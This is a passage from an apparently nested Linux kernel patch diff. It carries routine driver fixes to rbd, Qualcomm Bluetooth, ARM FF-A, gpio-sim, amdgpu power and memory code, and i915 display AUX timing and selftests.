+ {
+-	struct rbd_device *rbd_dev = img_req->rbd_dev;
+ 	int ret;
+ 
+ again:
+@@ -3514,9 +3539,6 @@ again:
+ 		if (*result)
+ 			return true;
+ 
+-		rbd_assert(!need_exclusive_lock(img_req) ||
+-			   __rbd_is_lock_owner(rbd_dev));
+-
+ 		rbd_img_object_requests(img_req);
+ 		if (!img_req->pending.num_pending) {
+ 			*result = img_req->pending.result;
+@@ -3978,6 +4000,10 @@ static int rbd_post_acquire_action(struct rbd_device *rbd_dev)
+ {
+ 	int ret;
+ 
++	ret = rbd_dev_refresh(rbd_dev);
++	if (ret)
++		return ret;
++
+ 	if (rbd_dev->header.features & RBD_FEATURE_OBJECT_MAP) {
+ 		ret = rbd_object_map_open(rbd_dev);
+ 		if (ret)
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 7b9fd5f104335..45dffd2cbc719 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -78,7 +78,8 @@ enum qca_flags {
+ 	QCA_HW_ERROR_EVENT,
+ 	QCA_SSR_TRIGGERED,
+ 	QCA_BT_OFF,
+-	QCA_ROM_FW
++	QCA_ROM_FW,
++	QCA_DEBUGFS_CREATED,
+ };
+ 
+ enum qca_capabilities {
+@@ -635,6 +636,9 @@ static void qca_debugfs_init(struct hci_dev *hdev)
+ 	if (!hdev->debugfs)
+ 		return;
+ 
++	if (test_and_set_bit(QCA_DEBUGFS_CREATED, &qca->flags))
++		return;
++
+ 	ibs_dir = debugfs_create_dir("ibs", hdev->debugfs);
+ 
+ 	/* read only */
+diff --git a/drivers/firmware/arm_ffa/driver.c b/drivers/firmware/arm_ffa/driver.c
+index 5904a679d3512..c37e823590055 100644
+--- a/drivers/firmware/arm_ffa/driver.c
++++ b/drivers/firmware/arm_ffa/driver.c
+@@ -505,6 +505,7 @@ ffa_setup_and_transmit(u32 func_id, void *buffer, u32 max_fragsize,
+ 		ep_mem_access->flag = 0;
+ 		ep_mem_access->reserved = 0;
+ 	}
++	mem_region->handle = 0;
+ 	mem_region->reserved_0 = 0;
+ 	mem_region->reserved_1 = 0;
+ 	mem_region->ep_count = args->nattrs;
+diff --git a/drivers/gpio/gpio-sim.c b/drivers/gpio/gpio-sim.c
+index cff68f31a09fd..803676e307d73 100644
+--- a/drivers/gpio/gpio-sim.c
++++ b/drivers/gpio/gpio-sim.c
+@@ -717,8 +717,10 @@ static char **gpio_sim_make_line_names(struct gpio_sim_bank *bank,
+ 	if (!line_names)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	list_for_each_entry(line, &bank->line_list, siblings)
+-		line_names[line->offset] = line->name;
++	list_for_each_entry(line, &bank->line_list, siblings) {
++		if (line->name && (line->offset <= max_offset))
++			line_names[line->offset] = line->name;
++	}
+ 
+ 	return line_names;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 4feedf518a191..ad8cb9e6d1ab0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -79,9 +79,10 @@ static void amdgpu_bo_user_destroy(struct ttm_buffer_object *tbo)
+ static void amdgpu_bo_vm_destroy(struct ttm_buffer_object *tbo)
+ {
+ 	struct amdgpu_device *adev = amdgpu_ttm_adev(tbo->bdev);
+-	struct amdgpu_bo *bo = ttm_to_amdgpu_bo(tbo);
++	struct amdgpu_bo *shadow_bo = ttm_to_amdgpu_bo(tbo), *bo;
+ 	struct amdgpu_bo_vm *vmbo;
+ 
++	bo = shadow_bo->parent;
+ 	vmbo = to_amdgpu_bo_vm(bo);
+ 	/* in case amdgpu_device_recover_vram got NULL of bo->parent */
+ 	if (!list_empty(&vmbo->shadow_list)) {
+@@ -691,11 +692,6 @@ int amdgpu_bo_create_vm(struct amdgpu_device *adev,
+ 		return r;
+ 
+ 	*vmbo_ptr = to_amdgpu_bo_vm(bo_ptr);
+-	INIT_LIST_HEAD(&(*vmbo_ptr)->shadow_list);
+-	/* Set destroy callback to amdgpu_bo_vm_destroy after vmbo->shadow_list
+-	 * is initialized.
+-	 */
+-	bo_ptr->tbo.destroy = &amdgpu_bo_vm_destroy;
+ 	return r;
+ }
+ 
+@@ -712,6 +708,8 @@ void amdgpu_bo_add_to_shadow_list(struct amdgpu_bo_vm *vmbo)
+ 
+ 	mutex_lock(&adev->shadow_list_lock);
+ 	list_add_tail(&vmbo->shadow_list, &adev->shadow_list);
++	vmbo->shadow->parent = amdgpu_bo_ref(&vmbo->bo);
++	vmbo->shadow->tbo.destroy = &amdgpu_bo_vm_destroy;
+ 	mutex_unlock(&adev->shadow_list_lock);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+index 01e42bdd8e4e8..4642cff0e1a4f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+@@ -564,7 +564,6 @@ int amdgpu_vm_pt_create(struct amdgpu_device *adev, struct amdgpu_vm *vm,
+ 		return r;
+ 	}
+ 
+-	(*vmbo)->shadow->parent = amdgpu_bo_ref(bo);
+ 	amdgpu_bo_add_to_shadow_list(*vmbo);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
+index 75c80c557b6ec..16594a0a6d186 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
+@@ -799,7 +799,7 @@ static void amdgpu_vram_mgr_debug(struct ttm_resource_manager *man,
+ {
+ 	struct amdgpu_vram_mgr *mgr = to_vram_mgr(man);
+ 	struct drm_buddy *mm = &mgr->mm;
+-	struct drm_buddy_block *block;
++	struct amdgpu_vram_reservation *rsv;
+ 
+ 	drm_printf(printer, "  vis usage:%llu\n",
+ 		   amdgpu_vram_mgr_vis_usage(mgr));
+@@ -811,8 +811,9 @@ static void amdgpu_vram_mgr_debug(struct ttm_resource_manager *man,
+ 	drm_buddy_print(mm, printer);
+ 
+ 	drm_printf(printer, "reserved:\n");
+-	list_for_each_entry(block, &mgr->reserved_pages, link)
+-		drm_buddy_block_print(mm, block, printer);
++	list_for_each_entry(rsv, &mgr->reserved_pages, blocks)
++		drm_printf(printer, "%#018llx-%#018llx: %llu\n",
++			rsv->start, rsv->start + rsv->size, rsv->size);
+ 	mutex_unlock(&mgr->lock);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/vi.c b/drivers/gpu/drm/amd/amdgpu/vi.c
+index d6c37c90c628c..53a3bb7fc9c47 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vi.c
++++ b/drivers/gpu/drm/amd/amdgpu/vi.c
+@@ -542,8 +542,15 @@ static u32 vi_get_xclk(struct amdgpu_device *adev)
+ 	u32 reference_clock = adev->clock.spll.reference_freq;
+ 	u32 tmp;
+ 
+-	if (adev->flags & AMD_IS_APU)
+-		return reference_clock;
++	if (adev->flags & AMD_IS_APU) {
++		switch (adev->asic_type) {
++		case CHIP_STONEY:
++			/* vbios says 48Mhz, but the actual freq is 100Mhz */
++			return 10000;
++		default:
++			return reference_clock;
++		}
++	}
+ 
+ 	tmp = RREG32_SMC(ixCG_CLKPIN_CNTL_2);
+ 	if (REG_GET_FIELD(tmp, CG_CLKPIN_CNTL_2, MUX_TCLK_TO_XCLK))
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index d2b184fdd7e02..f28caece5f901 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -137,7 +137,7 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_2_soc = {
+ 	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
+-	.pct_ideal_sdp_bw_after_urgent = 100.0,
++	.pct_ideal_sdp_bw_after_urgent = 90.0,
+ 	.pct_ideal_fabric_bw_after_urgent = 67.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_only = 20.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_and_vm = 60.0, // N/A, for now keep as is until DML implemented
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 75f18681e984c..85d53597eb07a 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2067,33 +2067,94 @@ static int sienna_cichlid_display_disable_memory_clock_switch(struct smu_context
+ 	return ret;
+ }
+ 
++static void sienna_cichlid_get_override_pcie_settings(struct smu_context *smu,
++						      uint32_t *gen_speed_override,
++						      uint32_t *lane_width_override)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	*gen_speed_override = 0xff;
++	*lane_width_override = 0xff;
++
++	switch (adev->pdev->device) {
++	case 0x73A0:
++	case 0x73A1:
++	case 0x73A2:
++	case 0x73A3:
++	case 0x73AB:
++	case 0x73AE:
++		/* Bit 7:0: PCIE lane width, 1 to 7 corresponds is x1 to x32 */
++		*lane_width_override = 6;
++		break;
++	case 0x73E0:
++	case 0x73E1:
++	case 0x73E3:
++		*lane_width_override = 4;
++		break;
++	case 0x7420:
++	case 0x7421:
++	case 0x7422:
++	case 0x7423:
++	case 0x7424:
++		*lane_width_override = 3;
++		break;
++	default:
++		break;
++	}
++}
++
++#define MAX(a, b)	((a) > (b) ? (a) : (b))
++
+ static int sienna_cichlid_update_pcie_parameters(struct smu_context *smu,
+ 					 uint32_t pcie_gen_cap,
+ 					 uint32_t pcie_width_cap)
+ {
+ 	struct smu_11_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+-
+-	uint32_t smu_pcie_arg;
++	struct smu_11_0_pcie_table *pcie_table = &dpm_context->dpm_tables.pcie_table;
++	uint32_t gen_speed_override, lane_width_override;
+ 	uint8_t *table_member1, *table_member2;
++	uint32_t min_gen_speed, max_gen_speed;
++	uint32_t min_lane_width, max_lane_width;
++	uint32_t smu_pcie_arg;
+ 	int ret, i;
+ 
+ 	GET_PPTABLE_MEMBER(PcieGenSpeed, &table_member1);
+ 	GET_PPTABLE_MEMBER(PcieLaneCount, &table_member2);
+ 
+-	/* lclk dpm table setup */
+-	for (i = 0; i < MAX_PCIE_CONF; i++) {
+-		dpm_context->dpm_tables.pcie_table.pcie_gen[i] = table_member1[i];
+-		dpm_context->dpm_tables.pcie_table.pcie_lane[i] = table_member2[i];
++	sienna_cichlid_get_override_pcie_settings(smu,
++						  &gen_speed_override,
++						  &lane_width_override);
++
++	/* PCIE gen speed override */
++	if (gen_speed_override != 0xff) {
++		min_gen_speed = MIN(pcie_gen_cap, gen_speed_override);
++		max_gen_speed = MIN(pcie_gen_cap, gen_speed_override);
++	} else {
++		min_gen_speed = MAX(0, table_member1[0]);
++		max_gen_speed = MIN(pcie_gen_cap, table_member1[1]);
++		min_gen_speed = min_gen_speed > max_gen_speed ?
++				max_gen_speed : min_gen_speed;
+ 	}
++	pcie_table->pcie_gen[0] = min_gen_speed;
++	pcie_table->pcie_gen[1] = max_gen_speed;
++
++	/* PCIE lane width override */
++	if (lane_width_override != 0xff) {
++		min_lane_width = MIN(pcie_width_cap, lane_width_override);
++		max_lane_width = MIN(pcie_width_cap, lane_width_override);
++	} else {
++		min_lane_width = MAX(1, table_member2[0]);
++		max_lane_width = MIN(pcie_width_cap, table_member2[1]);
++		min_lane_width = min_lane_width > max_lane_width ?
++				 max_lane_width : min_lane_width;
++	}
++	pcie_table->pcie_lane[0] = min_lane_width;
++	pcie_table->pcie_lane[1] = max_lane_width;
+ 
+ 	for (i = 0; i < NUM_LINK_LEVELS; i++) {
+-		smu_pcie_arg = (i << 16) |
+-			((table_member1[i] <= pcie_gen_cap) ?
+-			 (table_member1[i] << 8) :
+-			 (pcie_gen_cap << 8)) |
+-			((table_member2[i] <= pcie_width_cap) ?
+-			 table_member2[i] :
+-			 pcie_width_cap);
++		smu_pcie_arg = (i << 16 |
++				pcie_table->pcie_gen[i] << 8 |
++				pcie_table->pcie_lane[i]);
+ 
+ 		ret = smu_cmn_send_smc_msg_with_param(smu,
+ 				SMU_MSG_OverridePcieParameters,
+@@ -2101,11 +2162,6 @@ static int sienna_cichlid_update_pcie_parameters(struct smu_context *smu,
+ 				NULL);
+ 		if (ret)
+ 			return ret;
+-
+-		if (table_member1[i] > pcie_gen_cap)
+-			dpm_context->dpm_tables.pcie_table.pcie_gen[i] = pcie_gen_cap;
+-		if (table_member2[i] > pcie_width_cap)
+-			dpm_context->dpm_tables.pcie_table.pcie_lane[i] = pcie_width_cap;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 479cbf05c3310..5143b4df2cc14 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -582,11 +582,11 @@ int smu_v13_0_init_power(struct smu_context *smu)
+ 	if (smu_power->power_context || smu_power->power_context_size != 0)
+ 		return -EINVAL;
+ 
+-	smu_power->power_context = kzalloc(sizeof(struct smu_13_0_dpm_context),
++	smu_power->power_context = kzalloc(sizeof(struct smu_13_0_power_context),
+ 					   GFP_KERNEL);
+ 	if (!smu_power->power_context)
+ 		return -ENOMEM;
+-	smu_power->power_context_size = sizeof(struct smu_13_0_dpm_context);
++	smu_power->power_context_size = sizeof(struct smu_13_0_power_context);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_aux.c b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+index 7f3f2d50e6cde..ab357161ccc3a 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_aux.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+@@ -119,6 +119,32 @@ static u32 skl_get_aux_clock_divider(struct intel_dp *intel_dp, int index)
+ 	return index ? 0 : 1;
+ }
+ 
++static int intel_dp_aux_sync_len(void)
++{
++	int precharge = 16; /* 10-16 */
++	int preamble = 16;
++
++	return precharge + preamble;
++}
++
++static int intel_dp_aux_fw_sync_len(void)
++{
++	int precharge = 10; /* 10-16 */
++	int preamble = 8;
++
++	return precharge + preamble;
++}
++
++static int g4x_dp_aux_precharge_len(void)
++{
++	int precharge_min = 10;
++	int preamble = 16;
++
++	/* HW wants the length of the extra precharge in 2us units */
++	return (intel_dp_aux_sync_len() -
++		precharge_min - preamble) / 2;
++}
++
+ static u32 g4x_get_aux_send_ctl(struct intel_dp *intel_dp,
+ 				int send_bytes,
+ 				u32 aux_clock_divider)
+@@ -141,7 +167,7 @@ static u32 g4x_get_aux_send_ctl(struct intel_dp *intel_dp,
+ 	       timeout |
+ 	       DP_AUX_CH_CTL_RECEIVE_ERROR |
+ 	       (send_bytes << DP_AUX_CH_CTL_MESSAGE_SIZE_SHIFT) |
+-	       (3 << DP_AUX_CH_CTL_PRECHARGE_2US_SHIFT) |
++	       (g4x_dp_aux_precharge_len() << DP_AUX_CH_CTL_PRECHARGE_2US_SHIFT) |
+ 	       (aux_clock_divider << DP_AUX_CH_CTL_BIT_CLOCK_2X_SHIFT);
+ }
+ 
+@@ -165,8 +191,8 @@ static u32 skl_get_aux_send_ctl(struct intel_dp *intel_dp,
+ 	      DP_AUX_CH_CTL_TIME_OUT_MAX |
+ 	      DP_AUX_CH_CTL_RECEIVE_ERROR |
+ 	      (send_bytes << DP_AUX_CH_CTL_MESSAGE_SIZE_SHIFT) |
+-	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(24) |
+-	      DP_AUX_CH_CTL_SYNC_PULSE_SKL(32);
++	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(intel_dp_aux_fw_sync_len()) |
++	      DP_AUX_CH_CTL_SYNC_PULSE_SKL(intel_dp_aux_sync_len());
+ 
+ 	if (intel_tc_port_in_tbt_alt_mode(dig_port))
+ 		ret |= DP_AUX_CH_CTL_TBT_IO;
+diff --git a/drivers/gpu/drm/i915/gem/selftests/i915_gem_context.c b/drivers/gpu/drm/i915/gem/selftests/i915_gem_context.c
+index c6ad67b90e8af..a4858be12ee76 100644
+--- a/drivers/gpu/drm/i915/gem/selftests/i915_gem_context.c
++++ b/drivers/gpu/drm/i915/gem/selftests/i915_gem_context.c
+@@ -179,97 +179,108 @@ out_file:
+ }
+ 
+ struct parallel_switch {
+-	struct task_struct *tsk;
++	struct kthread_worker *worker;
++	struct kthread_work work;
+ 	struct intel_context *ce[2];
++	int result;
+ };
+ 
+-static int __live_parallel_switch1(void *data)
++static void __live_parallel_switch1(struct kthread_work *work)
+ {
+-	struct parallel_switch *arg = data;
++	struct parallel_switch *arg =
++		container_of(work, typeof(*arg), work);
+ 	IGT_TIMEOUT(end_time);
+ 	unsigned long count;
+ 
+ 	count = 0;
++	arg->result = 0;
+ 	do {
+ 		struct i915_request *rq = NULL;
+-		int err, n;
++		int n;
+ 
+-		err = 0;
+-		for (n = 0; !err && n < ARRAY_SIZE(arg->ce); n++) {
++		for (n = 0; !arg->result && n < ARRAY_SIZE(arg->ce); n++) {
+ 			struct i915_request *prev = rq;
+ 
+ 			rq = i915_request_create(arg->ce[n]);
+ 			if (IS_ERR(rq)) {
+ 				i915_request_put(prev);
+-				return PTR_ERR(rq);
++				arg->result = PTR_ERR(rq);
++				break;
+ 			}
+ 
+ 			i915_request_get(rq);
+ 			if (prev) {
+-				err = i915_request_await_dma_fence(rq, &prev->fence);
++				arg->result =
++					i915_request_await_dma_fence(rq,
++								     &prev->fence);
+ 				i915_request_put(prev);
+ 			}
+ 
+ 			i915_request_add(rq);
+ 		}
++
++		if (IS_ERR_OR_NULL(rq))
++			break;
++
+ 		if (i915_request_wait(rq, 0, HZ) < 0)
+-			err = -ETIME;
++			arg->result = -ETIME;
++
+ 		i915_request_put(rq);
+-		if (err)
+-			return err;
+ 
+ 		count++;
+-	} while (!__igt_timeout(end_time, NULL));
++	} while (!arg->result && !__igt_timeout(end_time, NULL));
+ 
+-	pr_info("%s: %lu switches (sync)\n", arg->ce[0]->engine->name, count);
+-	return 0;
++	pr_info("%s: %lu switches (sync) <%d>\n",
++		arg->ce[0]->engine->name, count, arg->result);
+ }
+ 
+-static int __live_parallel_switchN(void *data)
++static void __live_parallel_switchN(struct kthread_work *work)
+ {
+-	struct parallel_switch *arg = data;
++	struct parallel_switch *arg =
++		container_of(work, typeof(*arg), work);
+ 	struct i915_request *rq = NULL;
+ 	IGT_TIMEOUT(end_time);
+ 	unsigned long count;
+ 	int n;
+ 
+ 	count = 0;
++	arg->result = 0;
+ 	do {
+-		for (n = 0; n < ARRAY_SIZE(arg->ce); n++) {
++		for (n = 0; !arg->result && n < ARRAY_SIZE(arg->ce); n++) {
+ 			struct i915_request *prev = rq;
+-			int err = 0;
+ 
+ 			rq = i915_request_create(arg->ce[n]);
+ 			if (IS_ERR(rq)) {
+ 				i915_request_put(prev);
+-				return PTR_ERR(rq);
++				arg->result = PTR_ERR(rq);
++				break;
+ 			}
+ 
+ 			i915_request_get(rq);
+ 			if (prev) {
+-				err = i915_request_await_dma_fence(rq, &prev->fence);
++				arg->result =
++					i915_request_await_dma_fence(rq,
++								     &prev->fence);
+ 				i915_request_put(prev);
+ 			}
+ 
+ 			i915_request_add(rq);
+-			if (err) {
+-				i915_request_put(rq);
+-				return err;
+-			}
+ 		}
+ 
+ 		count++;
+-	} while (!__igt_timeout(end_time, NULL));
+-	i915_request_put(rq);
++	} while (!arg->result && !__igt_timeout(end_time, NULL));
+ 
+-	pr_info("%s: %lu switches (many)\n", arg->ce[0]->engine->name, count);
+-	return 0;
++	if (!IS_ERR_OR_NULL(rq))
++		i915_request_put(rq);
++
++	pr_info("%s: %lu switches (many) <%d>\n",
++		arg->ce[0]->engine->name, count, arg->result);
+ }
+ 
+ static int live_parallel_switch(void *arg)
+ {
+ 	struct drm_i915_private *i915 = arg;
+-	static int (* const func[])(void *arg) = {
++	static void (* const func[])(struct kthread_work *) = {
+ 		__live_parallel_switch1,
+ 		__live_parallel_switchN,
+ 		NULL,
+@@ -277,7 +288,7 @@ static int live_parallel_switch(void *arg)
+ 	struct parallel_switch *data = NULL;
+ 	struct i915_gem_engines *engines;
+ 	struct i915_gem_engines_iter it;
+-	int (* const *fn)(void *arg);
++	void (* const *fn)(struct kthread_work *);
+ 	struct i915_gem_context *ctx;
+ 	struct intel_context *ce;
+ 	struct file *file;
+@@ -335,8 +346,10 @@ static int live_parallel_switch(void *arg)
+ 				continue;
+ 
+ 			ce = intel_context_create(data[m].ce[0]->engine);
+-			if (IS_ERR(ce))
++			if (IS_ERR(ce)) {
++				err = PTR_ERR(ce);
+ 				goto out;
++			}
+ 
+ 			err = intel_context_pin(ce);
+ 			if (err) {
+@@ -348,9 +361,24 @@ static int live_parallel_switch(void *arg)
+ 		}
+ 	}
+ 
++	for (n = 0; n < count; n++) {
++		struct kthread_worker *worker;
++
++		if (!data[n].ce[0])
++			continue;
++
++		worker = kthread_create_worker(0, "igt/parallel:%s",
++					       data[n].ce[0]->engine->name);
++		if (IS_ERR(worker)) {
++			err = PTR_ERR(worker);
++			goto out;
++		}
++
++		data[n].worker = worker;
++	}
++
+ 	for (fn = func; !err && *fn; fn++) {
+ 		struct igt_live_test t;
+-		int n;
+ 
+ 		err = igt_live_test_begin(&t, i915, __func__, "");
+ 		if (err)
+@@ -360,34 +388,23 @@ static int live_parallel_switch(void *arg)
+ 			if (!data[n].ce[0])
+ 				continue;
+ 
+-			data[n].tsk = kthread_run(*fn, &data[n],
+-						  "igt/parallel:%s",
+-						  data[n].ce[0]->engine->name);
+-			if (IS_ERR(data[n].tsk)) {
+-				err = PTR_ERR(data[n].tsk);
+-				break;
+-			}
+-			get_task_struct(data[n].tsk);
++			data[n].result = 0;
++			kthread_init_work(&data[n].work, *fn);
++			kthread_queue_work(data[n].worker, &data[n].work);
+ 		}
+ 
+-		yield(); /* start all threads before we kthread_stop() */
+-
+ 		for (n = 0; n < count; n++) {
+-			int status;
+-
+-			if (IS_ERR_OR_NULL(data[n].tsk))
+-				continue;
+-
+-			status = kthread_stop(data[n].tsk);
+-			if (status && !err)
+-				err = status;
+-
+-			put_task_struct(data[n].tsk);
+-			data[n].tsk = NULL;
++			if (data[n].ce[0]) {
++				kthread_flush_work(&data[n].work);
++				if (data[n].result && !err)
++					err = data[n].result;
++			}
+ 		}
+ 
+-		if (igt_live_test_end(&t))
+-			err = -EIO;
++		if (igt_live_test_end(&t)) {
++			err = err ?: -EIO;
++			break;
++		}
+ 	}
+ 
+ out:
+@@ -399,6 +416,9 @@ out:
+ 			intel_context_unpin(data[n].ce[m]);
+ 			intel_context_put(data[n].ce[m]);
+ 		}
++
++		if (data[n].worker)
++			kthread_destroy_worker(data[n].worker);
+ 	}
+ 	kfree(data);
+ out_file:
+diff --git a/drivers/gpu/drm/i915/gt/selftest_execlists.c b/drivers/gpu/drm/i915/gt/selftest_execlists.c
+index 1e08b2473b993..b370411d43628 100644
+--- a/drivers/gpu/drm/i915/gt/selftest_execlists.c
++++ b/drivers/gpu/drm/i915/gt/selftest_execlists.c
+@@ -1532,8 +1532,8 @@ static int live_busywait_preempt(void *arg)
+ 	struct drm_i915_gem_object *obj;
+ 	struct i915_vma *vma;
+ 	enum intel_engine_id id;
+-	int err = -ENOMEM;
+ 	u32 *map;
++	int err;
+ 
+ 	/*
+ 	 * Verify that even without HAS_LOGICAL_RING_PREEMPTION, we can
+@@ -1541,13 +1541,17 @@ static int live_busywait_preempt(void *arg)
+ 	 */
+ 
+ 	ctx_hi = kernel_context(gt->i915, NULL);
+-	if (!ctx_hi)
+-		return -ENOMEM;
++	if (IS_ERR(ctx_hi))
++		return PTR_ERR(ctx_hi);
++
+ 	ctx_hi->sched.priority = I915_CONTEXT_MAX_USER_PRIORITY;
+ 
+ 	ctx_lo = kernel_context(gt->i915, NULL);
+-	if (!ctx_lo)
++	if (IS_ERR(ctx_lo)) {
++		err = PTR_ERR(ctx_lo);
+ 		goto err_ctx_hi;
++	}
++
+ 	ctx_lo->sched.priority = I915_CONTEXT_MIN_USER_PRIORITY;
+ 
+ 	obj = i915_gem_object_create_internal(gt->i915, PAGE_SIZE);
+@@ -3475,12 +3479,14 @@ static int random_priority(struct rnd_state *rnd)
+ 
+ struct preempt_smoke {
+ 	struct intel_gt *gt;
++	struct kthread_work work;
+ 	struct i915_gem_context **contexts;
+ 	struct intel_engine_cs *engine;
+ 	struct drm_i915_gem_object *batch;
+ 	unsigned int ncontext;
+ 	struct rnd_state prng;
+ 	unsigned long count;
++	int result;
+ };
+ 
+ static struct i915_gem_context *smoke_context(struct preempt_smoke *smoke)
+@@ -3540,34 +3546,31 @@ unpin:
+ 	return err;
+ }
+ 
+-static int smoke_crescendo_thread(void *arg)
++static void smoke_crescendo_work(struct kthread_work *work)
+ {
+-	struct preempt_smoke *smoke = arg;
++	struct preempt_smoke *smoke = container_of(work, typeof(*smoke), work);
+ 	IGT_TIMEOUT(end_time);
+ 	unsigned long count;
+ 
+ 	count = 0;
+ 	do {
+ 		struct i915_gem_context *ctx = smoke_context(smoke);
+-		int err;
+ 
+-		err = smoke_submit(smoke,
+-				   ctx, count % I915_PRIORITY_MAX,
+-				   smoke->batch);
+-		if (err)
+-			return err;
++		smoke->result = smoke_submit(smoke, ctx,
++					     count % I915_PRIORITY_MAX,
++					     smoke->batch);
+ 
+ 		count++;
+-	} while (count < smoke->ncontext && !__igt_timeout(end_time, NULL));
++	} while (!smoke->result && count < smoke->ncontext &&
++		 !__igt_timeout(end_time, NULL));
+ 
+ 	smoke->count = count;
+-	return 0;
+ }
+ 
+ static int smoke_crescendo(struct preempt_smoke *smoke, unsigned int flags)
+ #define BATCH BIT(0)
+ {
+-	struct task_struct *tsk[I915_NUM_ENGINES] = {};
++	struct kthread_worker *worker[I915_NUM_ENGINES] = {};
+ 	struct preempt_smoke *arg;
+ 	struct intel_engine_cs *engine;
+ 	enum intel_engine_id id;
+@@ -3578,6 +3581,8 @@ static int smoke_crescendo(struct preempt_smoke *smoke, unsigned int flags)
+ 	if (!arg)
+ 		return -ENOMEM;
+ 
++	memset(arg, 0, I915_NUM_ENGINES * sizeof(*arg));
++
+ 	for_each_engine(engine, smoke->gt, id) {
+ 		arg[id] = *smoke;
+ 		arg[id].engine = engine;
+@@ -3585,31 +3590,28 @@ static int smoke_crescendo(struct preempt_smoke *smoke, unsigned int flags)
+ 			arg[id].batch = NULL;
+ 		arg[id].count = 0;
+ 
+-		tsk[id] = kthread_run(smoke_crescendo_thread, arg,
+-				      "igt/smoke:%d", id);
+-		if (IS_ERR(tsk[id])) {
+-			err = PTR_ERR(tsk[id]);
++		worker[id] = kthread_create_worker(0, "igt/smoke:%d", id);
++		if (IS_ERR(worker[id])) {
++			err = PTR_ERR(worker[id]);
+ 			break;
+ 		}
+-		get_task_struct(tsk[id]);
+-	}
+ 
+-	yield(); /* start all threads before we kthread_stop() */
++		kthread_init_work(&arg[id].work, smoke_crescendo_work);
++		kthread_queue_work(worker[id], &arg[id].work);
++	}
+ 
+ 	count = 0;
+ 	for_each_engine(engine, smoke->gt, id) {
+-		int status;
+-
+-		if (IS_ERR_OR_NULL(tsk[id]))
++		if (IS_ERR_OR_NULL(worker[id]))
+ 			continue;
+ 
+-		status = kthread_stop(tsk[id]);
+-		if (status && !err)
+-			err = status;
++		kthread_flush_work(&arg[id].work);
++		if (arg[id].result && !err)
++			err = arg[id].result;
+ 
+ 		count += arg[id].count;
+ 
+-		put_task_struct(tsk[id]);
++		kthread_destroy_worker(worker[id]);
+ 	}
+ 
+ 	pr_info("Submitted %lu crescendo:%x requests across %d engines and %d contexts\n",
+diff --git a/drivers/gpu/drm/i915/gt/selftest_hangcheck.c b/drivers/gpu/drm/i915/gt/selftest_hangcheck.c
+index 7f3bb1d34dfbf..71263058a7b05 100644
+--- a/drivers/gpu/drm/i915/gt/selftest_hangcheck.c
++++ b/drivers/gpu/drm/i915/gt/selftest_hangcheck.c
+@@ -866,10 +866,13 @@ static int igt_reset_active_engine(void *arg)
+ }
+ 
+ struct active_engine {
+-	struct task_struct *task;
++	struct kthread_worker *worker;
++	struct kthread_work work;
+ 	struct intel_engine_cs *engine;
+ 	unsigned long resets;
+ 	unsigned int flags;
++	bool stop;
++	int result;
+ };
+ 
+ #define TEST_ACTIVE	BIT(0)
+@@ -900,10 +903,10 @@ static int active_request_put(struct i915_request *rq)
+ 	return err;
+ }
+ 
+-static int active_engine(void *data)
++static void active_engine(struct kthread_work *work)
+ {
+ 	I915_RND_STATE(prng);
+-	struct active_engine *arg = data;
++	struct active_engine *arg = container_of(work, typeof(*arg), work);
+ 	struct intel_engine_cs *engine = arg->engine;
+ 	struct i915_request *rq[8] = {};
+ 	struct intel_context *ce[ARRAY_SIZE(rq)];
